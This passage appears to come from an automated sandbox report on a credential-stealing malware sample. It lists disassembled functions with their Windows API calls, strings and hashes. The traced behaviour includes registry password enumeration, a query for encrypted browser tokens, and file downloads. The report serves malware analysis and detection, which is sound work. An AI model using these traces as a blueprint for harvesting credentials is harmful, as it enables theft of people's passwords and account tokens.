                                                        • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                        Function 00B37767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B377A9
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B377E6
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3786A
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37871
                                                        • wsprintfA.USER32 ref: 00B378A7
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\$B
                                                        • API String ID: 1544550907-183544611
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: 2fb5902c9d1cdd5ad8ccdf01bb722070bbb23491073ea4392684e78739ec770e
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: 684182B1D44258EBDB10DF94CC85BEEBBB9EF48700F200199F505A7280DB756A84CBA6
                                                        Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                          • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                          • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                          • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                          • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                          • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                        • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                        • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                        • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                        • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                        • task.LIBCPMTD ref: 004076FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                        • String ID: :
                                                        • API String ID: 3191641157-3653984579
                                                        • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                        • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                        Function 00B31612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpy.KERNEL32(?,?), ref: 00B31642
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                          • Part of subcall function 00B394C7: StrStrA.SHLWAPI(?,?), ref: 00B394D3
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3167E
                                                          • Part of subcall function 00B394C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B394F7
                                                          • Part of subcall function 00B394C7: lstrlen.KERNEL32(?), ref: 00B3950E
                                                          • Part of subcall function 00B394C7: wsprintfA.USER32 ref: 00B3952E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B316C6
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3170E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B31755
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3179D
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B317E5
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B3182C
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00B31874
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                        • strtok_s.MSVCRT ref: 00B319B7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                        • String ID:
                                                        • API String ID: 4276352425-0
                                                        • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction ID: de17bcf454e56c29d618321a6b91162f9b464dfa252976e1e288600326079dfd
                                                        • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction Fuzzy Hash: 5971A3B2940118ABCB14FBB4DC89EEE73B9AF65300F2049D8F14DA2151EE759B84CF61
                                                        Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00407314
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                        • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                          • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                        • task.LIBCPMTD ref: 00407555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                        • String ID: Password
                                                        • API String ID: 2698061284-3434357891
                                                        • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                        • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                        Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,00829FC0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                        • lstrcatA.KERNEL32(?,007F7880), ref: 00414847
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                        • lstrcatA.KERNEL32(?,0082A8D0), ref: 0041486F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                          • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                          • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                          • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID: 0aA
                                                        • API String ID: 167551676-2786531170
                                                        • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                        • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                        Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00829B70,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00829B70,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                        • __aulldiv.LIBCMT ref: 00418172
                                                        • __aulldiv.LIBCMT ref: 00418180
                                                        • wsprintfA.USER32 ref: 004181AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                        • String ID: %d MB$@
                                                        • API String ID: 2886426298-3474575989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                        Function 00B26307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00B26376
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B263AE
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B263F6
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B2641A
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00B26443
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B26471
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00B264B0
                                                        • InternetCloseHandle.WININET(?), ref: 00B264BA
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B264C7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 4287319946-0
                                                        • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction ID: 17c10dc79e0c2974e9733b0d6e187607687e7ef9068650737aafaaa5f5b33aca
                                                        • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction Fuzzy Hash: 765152B5940218AFDB20EF90DC45BEE77B9EB44701F1080D8F649A72C0DB746A85CF95
                                                        Function 00B34FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B34FEE
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B35017
                                                        • lstrcat.KERNEL32(?,00421000), ref: 00B35034
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                          • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                        • memset.MSVCRT ref: 00B3507A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B350A3
                                                        • lstrcat.KERNEL32(?,00421020), ref: 00B350C0
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                          • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                          • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        • memset.MSVCRT ref: 00B35106
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3512F
                                                        • lstrcat.KERNEL32(?,00421038), ref: 00B3514C
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C17
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B34C2C
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34C49
                                                          • Part of subcall function 00B34B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B34C85
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,0064A524), ref: 00B34CB1
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B34CC3
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CD7
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B34CE9
                                                          • Part of subcall function 00B34B77: lstrcat.KERNEL32(?,?), ref: 00B34CFD
                                                          • Part of subcall function 00B34B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B34D13
                                                          • Part of subcall function 00B34B77: DeleteFileA.KERNEL32(?), ref: 00B34D98
                                                        • memset.MSVCRT ref: 00B35192
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID:
                                                        • API String ID: 4017274736-0
                                                        • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction ID: 0d468eea5b52cb56e3775011ab45deef1c93e9183d8ce058407912b590eb2e9f
                                                        • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                        • Instruction Fuzzy Hash: 5C41D579A4021467C714F7B0EC47FD97778AF25701F5044D4B689660D1EEB897C88B92
                                                        Function 00B38367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00B38397
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B3839E
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B383BF
                                                        • __aulldiv.LIBCMT ref: 00B383D9
                                                        • __aulldiv.LIBCMT ref: 00B383E7
                                                        • wsprintfA.USER32 ref: 00B38413
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                        • String ID: @
                                                        • API String ID: 2774356765-2766056989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: a41ea1299fbf37b94a7d6dc89ea32a35f9b86d435cfaf73fdfcf0350893b4112
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: FC214AB1E44318ABDB00DFD4DC49FAEBBB9FB44B04F204649F605BB680C77869008BA5
                                                        Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                        • API String ID: 1440504306-1079375795
                                                        • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                        • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                        • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                        Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess$DefaultLangUser
                                                        • String ID: B
                                                        • API String ID: 1494266314-2248957098
                                                        • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                        • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                        • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                        Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                        • memset.MSVCRT ref: 00409EE8
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                        • API String ID: 1977917189-1096346117
                                                        • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                        • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                        • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                        Function 00B27837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B27537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
